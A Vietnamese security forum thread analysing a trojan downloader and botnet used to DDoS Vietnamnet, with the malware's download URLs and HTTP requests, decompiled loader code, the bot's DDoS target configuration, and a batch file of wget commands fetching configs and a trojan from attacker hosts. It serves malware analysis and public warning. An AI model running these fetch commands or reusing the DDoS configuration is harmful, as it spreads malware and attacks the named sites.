| |
|
|
Đi đâu cũng gặp Internet Download Manager và Unikey. Chỉ cầy cài cắm malware vào 2 app này là đủ rồi. Bà con nào đang dùng IDM crack + Unikey download tùm lum trên mạng về làm ơn remove, delete, kill, uninstall ngay.
Nếu dùng Firefox như tôi thì dùng cái Addon DownThemAll cũng rất tốt rồi.
Cậu chieutuongtu làm ơn xoá giùm 2 soft trên:
IDM: c:\program files (x86)\internet download manager\idman.exe
Unikey: e:\softwares\linh tinh\unikey40rc2-1101-win64\unikeynt.exe: Ông này là virus thứ thiệt, tôi đã từng phân tích nó.
Cậu tìm, zip lại và up lên mediafire các file sau:
1. c:\users\minh dtu\appdata\local\google\update\googleupdate.exe
2. c:\program files (x86)\dell datasafe local backup\components\scheduler\launcher.exe
3. c:\program files (x86)\common files\adobe\switchboard\switchboard.exe
4. c:\program files (x86)\quicktime\qttask.exe
5. c:\program files (x86)\poweriso\pwrisovm.exe
6. c:\program files (x86)\common files\nokia\mplatform\nokiamserver.exe
7. c:\program files (x86)\dell webcam\dell webcam central\webcamdell2.exe
8. c:\program files (x86)\internet download manager\idman.exe
Trong đám này, có 3 file nghi ngờ nhất là googleupdate.exe, switchboard.exe, idman.exe. Hầu như log AutoRuns nào tôi cũng thấy.
PS: Ngày hôm qua tình cờ đọc một bài viết của đám 29A public trên mạng, tụi nó đã có thể extract digital signature từ 1 file sạch và ghép vào 1 file malware của tụi nó. Thằng Nga này còn cung cấp source C + exe luôn.
Bởi vậy, không tin cái gì được cả. Thời buổi đão lộn !
|
 |
|
|
http://analysis.avira.com/samples/details.php?uniqueid=KcAZAjtnOS4VD6kgfsrWYGchX1gq6Lvn
Kể ra up cũng khá nhiều, và hầu hết đã bị Avira chụp hết, ngay cả cái IAStor cũng đã được đưa vào danh sách.
Avira số 1, KAV+MS số 2. Bỏ công sức ra viết mail cũng đáng.
|
|
|
|
|
Trong 4 cái link trên của IAStore thì thấy có 2 cái đặt ở Parkistan, 2 cái ở US. Bà con kiểm tra thử !
|
|
|
|
Kết quả debug ra các host của con trojan downloader IAStor này sẽ down bot về:
Code:
http://direct.fqin.net/codec.zip
http://easy.lixns.com/codec.zip
http://find.laxt.net/codec.zip
http://second.xzin.net/codec.zip
GET /codec.zip?id=ST0wJlBDPUtpbGxTVEwmQ0w9ezRFNUJCMzRGLTAwMDAtMDAwMC1BMUZDLUQ0NDIwQkExN0JDRH0mQ2xhc3M9NS0xLTI2MDAtMiZDaGVja3N1bTAwMT0mQ2hlY2tzdW0wMDI9JkNoZWNrc3VtMDAzPSZDaGVja3N1bTAwND0mUj0zMjY2
Host: easy.lixns.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)
Connection: close
Cache-Control: no-cache
GET /codec.zip?id=ST0wJlBDPUtpbGxTVEwmQ0w9ezRFNUJCMzRGLTAwMDAtMDAwMC1BMUZDLUQ0NDIwQkExN0JDRH0mQ2xhc3M9NS0xLTI2MDAtMiZDaGVja3N1bTAwMT0mQ2hlY2tzdW0wMDI9JkNoZWNrc3VtMDAzPSZDaGVja3N1bTAwND0mUj0zMjY2
Host: direct.fqin.net
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)
Connection: close
Cache-Control: no-cache
GET /codec.zip?id=ST0wJlBDPUtpbGxTVEwmQ0w9ezRFNUJCMzRGLTAwMDAtMDAwMC1BMUZDLUQ0NDIwQkExN0JDRH0mQ2xhc3M9NS0xLTI2MDAtMiZDaGVja3N1bTAwMT0mQ2hlY2tzdW0wMDI9JkNoZWNrc3VtMDAzPSZDaGVja3N1bTAwND0mUj0zMjY2
Host: find.laxt.net
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)
Connection: close
Cache-Control: no-cache
GET /codec.zip?id=ST0wJlBDPUtpbGxTVEwmQ0w9ezRFNUJCMzRGLTAwMDAtMDAwMC1BMUZDLUQ0NDIwQkExN0JDRH0mQ2xhc3M9NS0xLTI2MDAtMiZDaGVja3N1bTAwMT0mQ2hlY2tzdW0wMDI9JkNoZWNrc3VtMDAzPSZDaGVja3N1bTAwND0mUj0zMjY2
Host: second.xzin.net
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)
Connection: close
Cache-Control: no-cache
Các bạn để ý: User-Agent đặc biệt của nó và chuổi đằng sau id=. Đây là chuổi Base64 Encode, chứa thông tin lây nhiễm trên máy victim.
|
|
|
|
Mấy ngày hôm nay, lu bu nhiều chuyện, toàn chuyện không vui, trên trời rơi xuống, nên không tiếp tục RCE mẫu IAStore được. Bà con thông cảm !
Cũng mệt mỏi và chán nãn lắm, tính bỏ ngang, nhưng nghĩ lại: đã làm là phải làm cho trót, nếu bỏ ngang thì IAStore sẽ tiếp tục download bot mới của nó về, cập nhật và tiếp tục tấn công DDOS vào Vietnamnet. Mẫu ITunes thì gần như sắp bị die rồi, các AVs hầu hết đã cập nhật, mẫu IAStore thì cứ được báo về là "Clean". Đạo đức nghề nghiệp thằng "non-IT" như tui thấy không cho phép, thấy cái sai mà phải nhắm mắt làm ngơ thì ấm ức không chịu được. Hơn nữa, tự nhủ lương tâm là mình đang làm đúng, không cố ý cố tình hại ai cả, chỉ là vô tư, không vụ lợi, bỏ chút công sức "còm" để đóng góp một tay cho cộng đồng Internet Vietnam ta.
Có lẽ từ trước tới giờ, mẫu ITStore này là mẫu khổng lồ nhất, phức tạp nhất mà tôi đã gặp. Code cực kỳ phức tạp, phân tách nhiệm vụ ra rõ ràng hết. Exe đăng ký run như một service, điều phối hoạt động của 5 dll còn lại. Mỗi dll một nhiệm vụ, dll đăng ký registry, đánh dấu lây nhiểm, 2 dll làm nhiệm vụ download, 1 dll làm nhiệm vụ giãi mã bước 1, 1 dll làm nhiệm vụ bước 2, giãi mã xong ghi xuống harddisk và run.
Bản thân chúng nếu phân tách ra phân tích từng file thì thấy hầu như là file sạch, code VC++ 2010 bình thường, code rất trong sáng, không dùng một kỹ thuật AntiRCE, antiAV, antiVM... gì cả. Nhưng nối chúng lại với nhau, tập trung ở đầu ra cuối cùng của chúng sẽ thấy.
Coder của con bot này lần này dùng hoàn toàn thư viện CryptoPP: http://www.cryptopp.com, bản mới nhất để làm nhiệm vụ encrypt các link download và để giải mã file malware download về. Và lại dùng toàn CString class của ATLMFC VC++ 2010 để làm các nhiệm vụ thao tác chuỗi (string).
Static analysis hoàn toàn rất tốn công sức, vì vậy tôi chỉ tập trung vào debug là chính.
Con IAStore này cũng mắc lỗi như tôi đã nói lúc trước:
1. Vẫn tìm nhiều cách mã hoá các string quan trọng, nhưng tới thời điểm call API của socket API thì vẫn phải lòi ra clear text.
2. Vẫn dùng cách: giã mã file malware xong, ghi xuống %Temp% rồi CreateProcessA/W, cập nhật nó xong rồi nó mới bị xoá : DeleteFileA, DeleteFileW.
Một ít miêu tã:
1. IAStorUIHelper.dll làm nhiệm vụ download, dùng pure socket API, export ra 3 hàm mạo danh. Nhưng 3 hàm này phải được bên ngoài gọi và truyền tham số vào. Hàm InvokeEx là hàm khởi tạo Windows Socket, hàm GetCLSID chính là hàm download. Nó chỉ build trong ruột User-Agent và HTTP Request string, còn toàn bộ nhận từ input parameter (tham số truyền vào) từ caller (hàm gọi). Hàm QueryInterface trả toàn bộ nội dung đã download về caller.
2. IAStorDataMgr.dll chỉ export 1 hàm duy nhất, GetInstance, cũng nhận tham số từ caller. Hàm GetInstance sẽ call và truyền tham số cho 2 hàm: GetCLSID và QueryInterface của IAStorUIHelper.dll. Hàm GetInstance parse và giãi mã bước 1 nội dung lấy về, trả về caller.
3. IAStorDataMgrSvc sẽ kiểm tra có đủ và đúng bộ dlls của nó hay không:
Code:
bool __cdecl LoadDlls()
{
HMODULE hIAStorCommon; // eax@1
HMODULE hIAStorUIHelper; // eax@3
HMODULE hIAStorDataMgr; // eax@5
HMODULE hSmartPin; // eax@7
HMODULE hSysInftLib; // eax@9
hIAStorCommon = LoadLibraryW(L"IAStorCommon.dll");
if ( hIAStorCommon )
g_pfnGetFrameInfo = GetProcAddress(hIAStorCommon, "GetFrameInfo");
hIAStorUIHelper = LoadLibraryW(L"IAStorUIHelper.dll");
if ( hIAStorUIHelper )
{
g_pfnGetCLSID = GetProcAddress(hIAStorUIHelper, "GetCLSID");
g_pfnQueryInterface = GetProcAddress(v2, "QueryInterface");
g_pfnInvokeEx = GetProcAddress(v2, "InvokeEx");
}
hIAStorDataMgr = LoadLibraryW(L"IAStorDataMgr.dll");
if ( hIAStorDataMgr )
g_pfnGetInstance = GetProcAddress(hIAStorDataMgr, "GetInstance");
hSmartPin = LoadLibraryW(L"SmartPin.dll");
if ( hSmartPin )
g_pfnEnumSataPort = GetProcAddress(hSmartPin, "EnumSataPort");
hSysInftLib = LoadLibraryW(L"SysInftLib.dll");
if ( hSysInftLib )
g_pfnWaitForSignal = GetProcAddress(hSysInftLib, "WaitForSignal");
return g_pfnGetFrameInfo
&& g_pfnGetCLSID
&& g_pfnQueryInterface
&& g_pfnInvokeEx
&& g_pfnGetInstance
&& g_pfnEnumSataPort
&& g_pfnWaitForSignal;
}
Nếu return FALSE, nó sẽ exit. Còn nếu TRUE, nó bắt đầu làm việc download nhờ các thread và vòng loop vô tận.
EXE call InvokeEx của IAStorUIHelper.dll để khởi tạo Windows socket. Sau đó giải mã 4 link download dùng DES algorithm, truyền cho GetInstance, lấy kết quả trả về, rồi lại giãi mã một lần nữa để extract được file PE malware, ghi xuống %temp%, CreateProcess nó, wait xong delete.
|
|
|
|
Đúng rồi đấy vndncn. Sáng nay tôi vừa nhận được mail phản hồi từ MSE. Họ đã xác định k113.css là trojan:
https://www.microsoft.com/security/portal/Submission/SubmissionHistory.aspx?SubmissionId=13A47553-F32A-4AC3-8497-E5C314EEE27E
Rút kinh nghiệm, thay vì các bạn up các mẫu đang DDOS Vietnamnet cho các AVs bằng các website của họ, nếu kết quả của hệ thống phân tích tự động của họ trả về là clean, các bạn nên mail thẳng tới mail support của họ. Họ sẽ cử nhân viên manual analysis.
Ví dụ, vừa qua, một guru khét tiếng của Kaspersky (kẻ mà hacker Nga rất ghét, rất nổi tiếng về malware analysis) đã có mail hồi báo cho tôi về các mẫu fake Sanboxie, fake Itunes, IAStore, thông báo kết quả manual analysis của ông ấy, và không thằng nào lọt sổ cả  Ông ta có nói họ đang theo dõi hệ thống botnet này.
Tôi cũng đã gởi Fake ITunes và Fake IAStore cho bạn tôi ở Avira và MS.
|
|
|
|
|
Chỉ cần xoá nó rồi vào registry search ITunesHelper.exe rồi xoá đi. Vậy thôi.
|
|
|
|
Sao lại hic em, Avira nhai mất k113.css là mừng đấy chứ em. Avira đã gởi mail cho anh rồi mà.
Bà con cracker nào đang dùng P32Dasm không ? Author của tool này là Darker, bạn của em, key member của Avira Malware Analysis Team đấy !
|
|
|
|
2 phuongnvt: Dạ em đang buôn bán vàng, ngoại tệ trên mạng đó anh Hai !
Chỉ mong anh em, đồng bào stl đọc thật kỹ bài post vừa rồi của em ! Anh em ta và anh em stl hảy dừng tay lại đi. Đừng đấu đá với nhau nữa. Em và anh em HVA cũng mệt mỏi lắm rồi, anh em stl cũng vậy phải không ? Mắc mớ cái gì mà phải cam tâm đi làm tay sai cho tụi chó tàu khựa thâm độc, quỷ quyệt đó hả, anh em stl, rồi lại cõng rắn cắn gà nhà, đi hại chính đồng bào ruột thịt của mình ???
À, Avira vừa gởi cho em cái link này: http://analysis.avira.com/samples/details.php?uniqueid=KcAZAjtnOS4VD6kgfsrWYGchX1gq6Lvn&incidentid=810740. Từ từ rồi anh em stl của tôi sẽ thấy là mấy anh bị mất chân, mất tay dần dần đấy !
Chiều nay, tự nhiên thấy mệt mỏi, chán nãn quá rồi ! Bà con có hiểu tâm trạng của em không ? Hết chuyện làm rồi sao mà phải quay ra đấu đá giữa những người Việt lẫn nhau ???????????????????????????????????????????????????????????????????????????????????????
Em làm những việc RCE này chả vì nổi tiếng, tiền bạc gì cả. Thấy sai, bất bình là em nhảy vô. Từ lúc em theo mấy anh st tới giờ, mất nhiều hơn được. Nhưng em vẫn hài lòng, em đang làm đúng, làm theo lương tâm, đạo đức của 1 thằng IT thất nghiệp, nữa mùa như em, mấy anh stl hiểu không ? Mấy anh cứ việc chống phá những người "lề trái", các trang "lề trái", đó là việc mấy anh phải làm. Nhưng hành động cài cắm malwares, trojan, keylog trên các máy tính của người VN, biến các máy tính đó thành zombies của mấy anh là em không chấp nhận. Nhắc lại, em không chấp nhận. Việc của mấy anh, mấy anh cứ làm, đừng ảnh hưởng, gây hại tới người khác nhé. Em nói mấy anh stl hiểu không ? Mail của em: thang.cu.anh@gmail.com: hộp mail bí mật, mấy anh có gì trao đổi cứ mail cho em !
|
|
|
|
Chiều nay, nghỉ RCE, đi nhậu với thằng em rể.
Vài lời với mấy anh em stl: Tôi, anh em HVA này, và các bạn, toàn là người Việt thôi. Tại sao phải đấu đá với nhau làm gì ????
Em biết mấy anh cũng có nổi khổ của mấy anh, đã là sống chết theo lệnh rồi thì mấy anh, cũng chỉ là những người làm công ăn lương thôi, bị lệnh từ sếp ở trên ban xuống, phải gồng mình mà cố gắng lỳ lợm, trơ gan ra để hoàn thành lệnh sếp giao. Nhưng em cũng thừa biết mấy anh cũng phải miễn cưỡng mà làm thôi, vì miếng cơm manh áo, tiền bạc, gạo tiền, vợ con, gia đình thôi, phải không mấy anh em stl. Mấy anh em cũng giỏi lắm, em phải khen, rất giỏi (em chưa từng khen ai cả trong IT). Nhưng mấy anh ơi, quay đầu là bờ, mình phải cam tâm làm tay sai cho tàu khựa, bán nước, phản động, hại đồng loại của mình tới bao giờ nữa ??? Em mong mấy anh hảy bình tâm suy nghĩ lại đi !
Tới chiều nay, em chợt nghĩ lại, em tự nhiên thấy thương mấy anh quá, cùng là người Việt, cùng là dân IT với nhau, chỉ vì mấy thằng sếp bán nước mà anh em ta phải quay ra đấu đá lẫn nhau, truy cùng đuổi tận. Nếu lỡ có chuyện gì, thì chỉ mấy anh em ta là con tốt thí mạng, vắt chanh bỏ vỏ mà thôi. Chỉ nên chữi mấy thằng tàu nham hiểm, thâm độc đang nắm đầu mấy sếp của tụi anh thôi.
Vài lời chân tình, mong mấy anh em stl hiểu giùm tôi. Lần này, tôi nói rất chân tình, mong mấy anh em stl hiểu ! Mấy anh em nên nhớ, chúng ta cùng là người Việt, cùng nòi giống con Rồng cháu Tiên nhé. Hảy suy nghĩ lại đi, mấy anh em stl của tôi ơi ! Hảy cùng nhau phản đối, kiến nghị, đình công, biểu tình... lên mấy sếp của mấy anh, dừng ngay các hành động phạm pháp, xấu xa, đồi bại này lại. Em biết, chính quyền nào cũng có những tổ chức như mấy anh, nhưng đừng làm quá lắm. Mục tiêu "ổn định chính trị" của mấy anh, em công nhận là đúng, nhưng đừng dùng những hành động phạm pháp, đê hèn, xấu xa như vậy. Nếu không vì những hành động ấy, đường anh anh đi, đường em em đi. Em nói vậy mấy anh stl có hiểu không ?
|
|
|
|
Coi như toàn bộ Vietnamnet tê liệt rồi. Vào trang thethao.vietnamnet.vn cũng không được luôn, trắng nhách.
Sùng gan rồi nha ! Mấy ông nội "quăng bom" BKIS trốn đâu hết rồi, sao không ra mặt đi. Cái chuyện ở Hàn Quốc xa lắc xa lơ không ai nhờ, mấy ông "bồ chao" nhảy vô check chiếc bậy bạ, hắc hiết lung tung rồi la làng la xóm, quãng cáo trên báo đài. Sao vụ này mấy ông im re vậy ? Đại dịch ở VN đấy, người Việt phản động, bán nước cho tàu đánh người Việt đấy, sao không nhảy vô. Còn cái đám "Sứ giả thiện chiến" (cãi) của BKAV nữa, biến luôn đi cho em nhờ, đi đâu cũng quãng cáo được hết.
Một số lượng rất lớn "mèo què, mèo đui, mèo cụt" của stl như vậy, em bị stress nặng rồi, rce sơ sài, không hết nổi, không tới nơi tới chốn, ngay cả bản thân mình cũng bực. Bà con nào muốn học, thực tập RCE, "mèo què" analysis, cứ lên thư mục này download từng con về thực tập, vừa giúp mọi người luôn: http://www.mediafire.com/?tz745o0f678w8
Sorry bà con, em tức quá rồi !
Còn mấy thằng coder của stl, tụi mày giải nghệ đi cho tao nhờ, quay đi quay lại chỉ biết có CString không, chỉ biết ăn cắp code, đạo code không hả. Code như tụi mày cả năm nay rồi chả có lên tay gì hết. Nghỉ quách đi ! Tốn tiền của dân ngu cu đen như tụi tao. Tụi tao đóng thuế để nuôi cái đám bất tài vô tướng, mất đạo đức như tụi mày hả ? Nhà nước cho thằng nào trong tụi mày đi du học chỉ có uổng cơm uổng gạo, tốn tiền, tụi mày về chả đóng góp gì cho nhân dân hết, lại còn phá hoại, bán nước nữa. Tụi mày thức tỉnh đi, quay đầu đi !
Code thì chỉ 3, 4 hàm, còn CString thì tới mấy chục hàm. Anh em cùng công ty của tôi đang đọc topic này nhớ không, hồi đó coder nào dưới quyền em mà đụng một chút là CString là em phang ngay, bắt sữa ngay, anh em hồi đó la làng la xóm, ông TQN khó quá
Thôi, chữi vậy đủ rồi, quay lại PatchDiff tiếp cái IAStoreUIHelper.dll cái. Một lát nữa em sẽ cho ra cái địa chỉ mà thằng nằm vùng này down con bot về.
|
|
|
|
Hì hì, mấy anh stl chắc có cử người ngồi trực topic này phải không mấy anh ? Chắc cũng mệt lắm ha ? Trực làm chi nữa, đã bị "bạch hoá" hết rồi còn gì !
File index.txt lại bị mấy anh đổi content một lần nữa rồi:
Code:
UAC+80;//HEA+User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12;//HEA+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;//HEA+Accept-Language: en-us,en;q=0.5;//HEA+Accept-Encoding: gzip,deflate;//HEA+Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7;//HEA+Keep-Alive: 115;//HEA+Connection: keep-alive;//HEA+Referer: <i95I6m2s0k=>;//HEA+Cookie: <51hqVbyn5d=>;//\;/\
UAC+80;//HEA+User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:5.0) Gecko/20100101 Firefox/5.0;//HEA+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;//HEA+Accept-Language: en-us,en;q=0.5;//HEA+Accept-Encoding: gzip, deflate;//HEA+Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7;//HEA+Connection: close;//HEA+Referer: <i95I6m2s0k=>;//HEA+Cookie: <51hqVbyn5d=>;//HEA+Cache-Control: max-age=0;//\;/\
UAC+80;//HEA+User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12;//HEA+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;//HEA+Accept-Language: en-us,en;q=0.5;//HEA+Accept-Encoding: gzip,deflate;//HEA+Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7;//HEA+Connection: close;//HEA+Referer: <i95I6m2s0k=>;//HEA+Cookie: <51hqVbyn5d=>;//\;/\
UAC+80;//HEA+Connection: close;//HEA+Referer: <i95I6m2s0k=>;//HEA+User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30;//HEA+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;//HEA+Accept-Encoding: gzip,deflate,sdch;//HEA+Accept-Language: en-US,en;q=0.8;//HEA+Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3;//HEA+Cookie: <51hqVbyn5d=>;//\;/\
UAC+80;//HEA+User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27;//HEA+Referer: <i95I6m2s0k=>;//HEA+Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5;//HEA+Accept-Language: en-US;//HEA+Accept-Encoding: gzip, deflate;//HEA+Cookie: <51hqVbyn5d=>;//HEA+Connection: close;//\;/\
UAC+80;//HEA+User-Agent: Opera/9.80 (Windows NT 5.1; U; en) Presto/2.7.62 Version/11.01;//HEA+Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1;//HEA+Accept-Language: en-US,en;q=0.9;//HEA+Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1;//HEA+Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0;//HEA+Referer: <i95I6m2s0k=>;//HEA+Cookie: <51hqVbyn5d=>;//HEA+Connection: Keep-Alive, TE;//\;/\
UAC+80;//HEA+Accept: */*;//HEA+Referer: <i95I6m2s0k=>;//HEA+Accept-Language: en-us;//HEA+User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727);//HEA+Accept-Encoding: gzip, deflate;//HEA+Connection: close;//HEA+Cache-Control: no-cache;//HEA+Cookie: <51hqVbyn5d=>;//\;/\
UAC+80;//HEA+Accept: */*;//HEA+Referer: <i95I6m2s0k=>;//HEA+Accept-Language: en-US;//HEA+User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729);//HEA+Accept-Encoding: gzip, deflate;//HEA+Connection: Keep-Alive;//HEA+Cookie: <51hqVbyn5d=>;//\;/\
PRE+443;//DOM+vietnamnet.vn;//ITS+http://vietnamnet.vn/;//RET+http://vietnamnet.vn/vn/index.html;//REP+http://vietnamnet.vn/vn/index.html;//LIP+;//RIP+;//PRT+80;//PRP+;//PRD+;//PP2+;//PD2+;//VER+;//THE+5;//CON+30;//ANT+10;//EST+50;//MSP+;//MRP+;//LSL+;//LST+;//NOD+;//FOL+1;//FOM+5;//REF+1;//IGN+0;//ENC+;//SLE+1;//CRF+1;//CRL+1;//CRA+1;//BAC+1;//RAN+0;//CCR+20;//CCK+15;//FRE+;//FOR+1;//MAX+;//TIM+;//IZE+0;//KAT+;//JaJ+1;//FIR+0;//JOP+o;//JIN+325;//JAX+350;//JSI+;//FUN+0;//\;/\
PRE+443;//DOM+vietnamnet.vn;//ITS+http://vietnamnet.vn/;//RET+http://vietnamnet.vn/vn/index.html;//REP+http://vietnamnet.vn/vn/index.html;//LIP+;//RIP+vietnamnet.vn:80:117.103.197.249;//PRT+80;//PRP+;//PRD+;//PP2+;//PD2+;//VER+;//THE+5;//CON+30;//ANT+10;//EST+60;//MSP+;//MRP+;//LSL+;//LST+;//NOD+;//FOL+1;//FOM+5;//REF+1;//IGN+0;//ENC+;//SLE+1;//CRF+1;//CRL+1;//CRA+1;//BAC+1;//RAN+0;//CCR+20;//CCK+15;//FRE+;//FOR+1;//MAX+;//TIM+;//IZE+0;//KAT+;//JaJ+1;//FIR+0;//JOP+o;//JIN+325;//JAX+350;//JSI+;//FUN+0;//\;/\
PRE+443;//DOM+vietnamnet.vn;//ITS+http://vietnamnet.vn/vn/index.html;//RET+;//REP+;//LIP+;//RIP+vietnamnet.vn:80:123.30.133.166;//PRT+80;//PRP+;//PRD+;//PP2+;//PD2+;//VER+;//THE+5;//CON+45;//ANT+10;//EST+120;//MSP+;//MRP+;//LSL+;//LST+;//NOD+;//FOL+1;//FOM+5;//REF+1;//IGN+0;//ENC+DES;//SLE+1;//CRF+1;//CRL+1;//CRA+1;//BAC+0;//RAN+0;//CCR+20;//CCK+300;//FRE+;//FOR+1;//MAX+;//TIM+;//IZE+1;//KAT+;//JaJ+0;//FIR+0;//JOP+a;//JIN+325;//JAX+350;//JSI+;//FUN+0;//\;/\
PRE+443;//DOM+vietnamnet.vn;//ITS+http://vietnamnet.vn/vn/index.html;//RET+;//REP+;//LIP+;//RIP+vietnamnet.vn:80:123.30.184.10;//PRT+80;//PRP+;//PRD+;//PP2+;//PD2+;//VER+;//THE+5;//CON+35;//ANT+10;//EST+120;//MSP+;//MRP+;//LSL+;//LST+;//NOD+;//FOL+1;//FOM+5;//REF+1;//IGN+0;//ENC+DES;//SLE+1;//CRF+1;//CRL+1;//CRA+1;//BAC+0;//RAN+0;//CCR+20;//CCK+300;//FRE+;//FOR+1;//MAX+;//TIM+;//IZE+1;//KAT+;//JaJ+0;//FIR+0;//JOP+a;//JIN+325;//JAX+350;//JSI+;//FUN+0;//\;/\
PRE+443;//DOM+tuanvietnam.vietnamnet.vn;//ITS+http://tuanvietnam.vietnamnet.vn/;//RET+;//REP+;//LIP+;//RIP+;//PRT+80;//PRP+;//PRD+;//PP2+;//PD2+;//VER+;//THE+8;//CON+40;//ANT+10;//EST+150;//MSP+;//MRP+;//LSL+;//LST+;//NOD+;//FOL+1;//FOM+5;//REF+1;//IGN+;//ENC+;//SLE+1;//CRF+1;//CRL+1;//CRA+1;//BAC+1;//RAN+0;//CCR+20;//CCK+15;//FRE+;//FOR+;//MAX+;//TIM+;//IZE+1;//KAT+;//JaJ+0;//FIR+0;//JOP+a;//JIN+325;//JAX+350;//JSI+;//FUN+0;//\;/\
PRE+443;//DOM+vef.vn;//ITS+http://vef.vn/;//RET+;//REP+;//LIP+1;//RIP+;//PRT+80;//PRP+;//PRD+;//PP2+;//PD2+;//VER+;//THE+8;//CON+30;//ANT+10;//EST+150;//MSP+;//MRP+;//LSL+;//LST+;//NOD+;//FOL+1;//FOM+5;//REF+1;//IGN+;//ENC+;//SLE+1;//CRF+1;//CRL+0;//CRA+0;//BAC+1;//RAN+0;//CCR+20;//CCK+15;//FRE+;//FOR+;//MAX+;//TIM+;//IZE+1;//KAT+;//JaJ+0;//FIR+0;//JOP+a;//JIN+325;//JAX+350;//JSI+;//FUN+0;//\;/\
PRE+443;//DOM+m.vietnamnet.vn;//ITS+http://m.vietnamnet.vn/vn/index.html;//RET+;//REP+;//LIP+1;//RIP+;//PRT+80;//PRP+;//PRD+;//PP2+;//PD2+;//VER+;//THE+3;//CON+30;//ANT+10;//EST+120;//MSP+;//MRP+;//LSL+;//LST+;//NOD+;//FOL+1;//FOM+5;//REF+1;//IGN+;//ENC+;//SLE+1;//CRF+1;//CRL+0;//CRA+0;//BAC+1;//RAN+0;//CCR+30;//CCK+20;//FRE+;//FOR+;//MAX+;//TIM+;//IZE+1;//KAT+;//JaJ+0;//FIR+0;//JOP+o;//JIN+;//JAX+;//JSI+;//FUN+0;//\;/\
PRE+443;//DOM+vietnamweek.net;//ITS+http://vietnamweek.net/;//RET+;//REP+;//LIP+1;//RIP+;//PRT+80;//PRP+1;//PRD+;//PP2+;//PD2+;//VER+;//THE+3;//CON+35;//ANT+10;//EST+120;//MSP+;//MRP+;//LSL+;//LST+;//NOD+;//FOL+1;//FOM+2;//REF+1;//IGN+;//ENC+;//SLE+1;//CRF+1;//CRL+1;//CRA+1;//BAC+1;//RAN+0;//CCR+20;//CCK+20;//FRE+;//FOR+;//MAX+;//TIM+;//IZE+0;//KAT+;//JaJ+0;//FIR+0;//JOP+o;//JIN+;//JAX+;//JSI+;//FUN+0;//\;/\
PRE+443;//DOM+option.drfound.net;//ITS+http://option.drfound.net/k113.css;//LIP+;//RIP+;//PRT+80;//PRP+;//PRD+;//PP2+;//PD2+;//THE+1;//CON+100;//EST+1500;//NOD+1;//FOL+0;//REF+0;//ENC+RSA;//SLE+30;//BAC+0;//RAN+0;//CCR+;//CCK+;//FRE+;//FOR+;//MAX+;//POC+89;//PAT+AppData;//FLE+iTunes.tmp;//SIE+1054208;//JaJ+0;//FIR+0;//JOP+o;//JIN+;//JAX+;//JSI+;//FUN+0;//\;/\
Lần này, sau khi đọc topic này, mấy anh thêm cái http://tuanvietnam.vietnamnet.vn vào danh sách mục tiêu, triệt đường VNN hết à ? Khốn nạn thật, tìm đủ cách để DDOS VNN ngay cả khi đã bị vạch trần, phanh phui.
Các cơ quan chức năng của Vietnam ta đâu rồi, nhắm mắt làm ngơ hết rồi à, nhận được lệnh rồi à ?
|
|
|
|
Bà con tạo một thư mục Tracker chẵng hạn, chép đoạn bat file này vào file tracker.bat. Lâu lâu mấy bác buồn buồn không biết làm gì thì Enter nó giùm em một cái.
Code:
@echo off
echo ===============================================================================
echo Download cac file trojan, bot va DDOS config files cua stl dang DDOS Vietnamnet
echo ===============================================================================
echo.
wget -t3 "http://wide.ircop.cn/index.txt?113" -O wide.ircop.cn_index.txt
wget -t3 "http://pref.firebay.cn/index.txt?113" -O pref.firebay.cn_index.txt
wget -t3 "http://daily.leteaks.com/index.txt?113" -O daily.leteaks.com_index.txt
wget -t3 "http://link.susaks.com/index.txt?113" -O link.susaks.com_index.txt
wget -t3 "http://option.drfound.net/k113.css"
pause
